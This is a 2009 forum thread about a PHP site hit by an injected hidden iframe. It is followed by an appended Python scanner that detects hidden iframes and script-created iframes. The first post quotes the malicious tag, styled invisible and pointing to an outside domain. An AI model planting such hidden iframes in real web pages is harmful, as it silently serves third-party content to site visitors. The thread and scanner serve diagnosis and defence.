  1. #1
    khuramyz

    Help: Hacker Attack

    Hi There

    There is a mysterious piece of code being added to my websites (header, footer, both).
    The code looks like

    HTML Code:
    <iframe width="480" height="60" style="border: 0px none ; position: relative; top: 0px; left: -500px; opacity: 0;" src="http://profitooltip.biz/blog/feed.html"/>
    Can anyone tell me how could this happen as I have searched all my php files and nothing of the sort is there.

    Please help ASAP

    Kind Regards,
    Khuram Javaid
    PHP Developer and Entrepreneur
    http://www.phprad.com/

  2. #2
    AnthonySterling
    Have you tried disabling JS in your browser to see if the element is still created? Do you display user input on your site? If so, does any of it contain JS or links to JS?

    There's not much anyone can do without seeing your code... or at least a link to the site in question.
    @AnthonySterling: I'm a PHP developer, a consultant for oopnorth.com and the organiser of @phpne, a PHP User Group covering the North-East of England.

  3. #3
    Dan Grossman
    Do you run any scripts on this site which you did not author yourself? Are they not the very latest versions of those scripts? If you answered yes to those questions, that's a likely entry point.

    The other is through the whole server being compromised through someone else's account or vulnerable software.

    Contact the web host.

  4. #4
    khuramyz
    Hi, I have disabled my JavaScript and the sites are working perfectly.
    Nothing is being added.

  5. #5
    khuramyz
    @Silver

    Send you my url in PM.

  6. #6
    khuramyz
    Actually, the sites are on two separate servers. One in the UK and the other server in Germany.
    Also, I have no 3rd party software on my pages except Google Analytics and I have just updated my code but still the problem persists.

  7. #7
    khuramyz
    OK, it's something called an IFrame attack.
    I can't understand the entry point.
    Can you please point at how this could have happened?
    Malicious code adds itself to page's footer/header.
    But surely I haven't given out my FTP details to anyone.
    I also add mysql_real_escape_string to all my database insertions.

  8. #8
    AnthonySterling
    Quote (originally posted by khuramyz):
    @Silver

    Send you my url in PM.
    I have no PM.

  9. #9
    khuramyz
    Hi Silver

    I think I sent it to you in something else.
    Well, it seems like an iframe attack and may have stemmed from XSS.
    I am checking everything on my own.

  10. #10
    khuramyz
    If you have anything about how iframe attacks generate and how I can prevent them from my site then please share.
    Thanks

  11. #11
    lorenw
    Google for
    another-type-of-iframe-hack-php-exploit

    That's it.
    What I lack in acuracy I make up for in misteaks

  12. #12
    khuramyz
    Ummm, searching. Anyone with personal experience here?

  13. #13
    Basically you allowed the hacker to write to your filesystem. Most likely, you have a script somewhere which does something with the filesystem carelessly.

    SitePoint has a web security forum. You should read through some existing threads to get ideas on where and how to look for the hole.

    Be aware, the hole could very well be another website hosted on the same shared webserver.

  14. #14
    khuramyz
    I got a Plesk server with every site having its own FTP. Sites don't mingle. But it's still on the site.
    I asked for Apache error logs but nothing there.
    I don't know what to do.
    Last edited by khuramyz; May 8, 2009 at 06:23. Reason: added extra two lines

  15. #15
    There could be a variety of reasons.

    Remove that line of code, change your FTP password, see if it still persists.

    Change the CHMOD of the file in question and see if it still persists.

    Search for JavaScript that might have document.createElement("iframe") or document.write("iframe code here") and find out how that code got there.

    etc...
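
The search suggested in the last reply, combined with the hidden iframe from the first post, as an added example that is not part of the thread: a Python scanner that flags iframes styled to be invisible and script lines that create iframes. The file-extension list, the hiding heuristics and the `injected.example` sample page are assumptions of this example.

```python
import os
import re

# Patterns taken from the thread: the hidden <iframe> in the first post and
# the DOM calls named in the last reply. Thresholds are this example's choice.
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.I)
HIDING = re.compile(
    r"opacity\s*:\s*0(?![.\d])|display\s*:\s*none|visibility\s*:\s*hidden"
    r"|(?:left|top)\s*:\s*-\d+|(?:width|height)\s*=\s*[\"']?[01][\"']?(?!\d)",
    re.I)
JS_IFRAME = re.compile(
    r"document\.createElement\(\s*[\"']iframe[\"']\s*\)"
    r"|document\.write(?:ln)?\([^)]*iframe", re.I)
WEB_EXT = (".php", ".html", ".htm", ".js", ".tpl", ".inc")

def scan_text(text):
    """Return (line_no, kind, snippet) for each suspicious line in text."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        for tag in IFRAME_TAG.findall(line):
            if HIDING.search(tag):
                hits.append((no, "hidden-iframe", tag[:80]))
        if JS_IFRAME.search(line):
            hits.append((no, "js-iframe", line.strip()[:80]))
    return hits

def scan_tree(root):
    """Walk a web root; return {path: hits}, most recently modified first."""
    found = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(WEB_EXT):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_text(fh.read())
                if hits:
                    found[path] = hits
    return dict(sorted(found.items(),
                       key=lambda kv: os.path.getmtime(kv[0]), reverse=True))

# Constructed sample: one legitimate visible iframe plus both patterns.
SAMPLE = """<html><body>
<iframe width="480" height="300" src="/map.html"></iframe>
<iframe width="480" height="60" style="left: -500px; opacity: 0;" src="http://injected.example/feed.html"/>
<script>var f = document.createElement("iframe"); document.body.appendChild(f);</script>
</body></html>"""

if __name__ == "__main__":
    for hit in scan_text(SAMPLE):
        print(hit)
```

Matching is per line, so a tag split across several lines is missed. A hit in a file you did not edit recently, near the top of the `scan_tree` result, is the place to start comparing against a known-good copy.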

